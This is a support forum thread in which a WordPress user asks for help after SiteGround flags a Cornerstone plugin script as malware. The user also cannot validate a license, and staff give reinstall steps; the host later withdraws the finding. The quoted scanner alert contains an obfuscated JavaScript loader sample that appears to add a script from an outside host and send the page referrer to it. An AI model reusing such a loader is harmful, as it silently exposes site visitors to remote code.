Possible Malware + Connection issues

Hi,
I host my website on SiteGround, and it’s been fine so far for years. Yesterday I received an email from SG stating my website contains a malware and I should fix that the soonest.
So I checked and their message detail are as follow: “Malware found on javascript file: http://froble.com/wp-content/plugins/cornerstone/assets/js/dist/site/cs-body.min.js?ver=1.2.4
*Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?malware.js_type_obfuscation.1.1 yyiIF1()[(!!0+’’)[4] + 31…toString(36) + (!1+’’)[1] + (!1+’’)[2]](yyiIF1()[(!1+’’)[1] + (!0+’’)[0] + (’’+{})[1] + (’’+{})[2]]((‘ZnVuY3Rpb24gRkZ;fTWF;pbkZ1bmM’+‘oKX;t2YXIgYT0nZHYxdD;hha2Z;hJz’+‘tpZih0eXBlb2YgU3RvcmFnZSE9PSJ1bm’+‘RlZmluZW;QiKXtjb25zb2xlLmxv’+‘Zygn;dGVzd;CBzdG;9yYWdlIHNo’+‘aXQnKTtpZihsb2NhbF;N0b3Jh’+‘Z2VbJ35+f;lBOQ;U1+fn4;nXSE’+‘9PWEpe2NvbnNvbGU;ubG9n;KCdub’+‘yBzdG9y;YWdlIHZhciA;hIGFk’+‘ZCBzY3Jp;cHQgJyk7bG9jYWxTdG9;y’+‘YWdlWyd+fn5QTkFNfn5+J109YTt’+‘2YXIgYj1kb;2N1bWVudC5j;cmVhd’+‘GVFbGVtZW50KC;dzY3JpcHQnKT;tiLnNy’+‘Yz0naHR0cDovL2ZvbnQtdXBkYXRl;LmNvb’+‘S9qcy9oZWF;kZXIuanM/eD0nK2’+‘J0;b2EoZG9jdW1lbnQucmVmZXJyZXIpO2R’+‘vY3VtZW50L;mJvZHkuYXBwZW5kQ2hpbG’+‘QoYik7fX19d2luZG93LmFkZEV2Z’+‘W50TGlzdGVuZXIoJ2xvYWQnLEZGX0’+‘1haW5GdW5jKTs=’)qqmrrT[24]+qqmrrT[9]+qqmrrT[15]+qqmrrT[7]+qqmrrT[18]+qqmrrT[14]+qqmrrT[9]))

I tried to update the Cornerstone plugin but it asks for Theme validation, which now not accepting my license key stating connection issues.
I created a ticket with SG asking them to confirm the connection with Theme.co servers and they said everything is fine from their end and I should check with you.

I appreciate your help into fixing this issue.

Best,
Dana

Hi There,

Please remove Cornerstone via FTP from the folder

Wp-Content/Plugins/

Access https://theme.co/apex/licenses and assign your URL to your license.

Copy the License

go to WP Admin | X and validate your theme.

Go to Wp | Plugins | Installed Plugins activate Cornerstone.

Let us know how it goes

Thanks @Joao
License activated now. Waiting for hosting provider to review their malware detection thing.

Best,
Dana

Great, SiteGround just confirmed there are no malwares.
Thanks for your help.

Have a great day!

You’re most welcome.
